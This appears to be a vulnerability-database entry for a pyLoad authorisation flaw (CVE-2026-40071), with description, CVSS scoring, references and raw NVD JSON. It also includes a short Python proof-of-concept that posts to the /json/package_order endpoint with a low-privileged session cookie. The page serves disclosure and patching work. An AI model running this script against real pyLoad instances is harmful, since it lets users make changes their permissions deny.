CVE-2026-40071

Description

pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* - VULNERABLE

pyLoad < 0.5.0b3.dev97

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target = "http://127.0.0.1:8000"
endpoint = "/json/package_order"
url = target + endpoint

# Attacker's session (Low privilege user)
# Replace with a valid session cookie obtained after login
session_cookie = "pyload_session_id_here"

headers = {
    "Content-Type": "application/json",
    "Cookie": f"pyload_session={session_cookie}"
}

# Payload to modify package order
# This operation should require admin rights but is vulnerable
payload = {
    "pid": 1,
    "order": 0
}

try:
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Vulnerability exploited successfully!")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40071
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40071
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40071/
[4] VulDB https://vuldb.com/cve/CVE-2026-40071
[5] https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm
[6] https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40071", "sourceIdentifier": "[email protected]", "published": "2026-04-09T18:17:03.367", "lastModified": "2026-04-28T00:53:26.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the /json/package_order, /json/link_order, and /json/abort_link WebUI JSON endpoints enforce weaker permissions than the core API methods they invoke. This allows authenticated low-privileged users to execute MODIFY operations that should be denied by pyLoad's own permission model. This vulnerability is fixed in 0.5.0b3.dev97."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-04-13", "matchCriteriaId": "631877F0-7E83-469E-BC2B-244AB14E0274"}]}]}], "references": [{"url": "https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/pyload/pyload/security/advisories/GHSA-rfgh-63mg-8pwm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}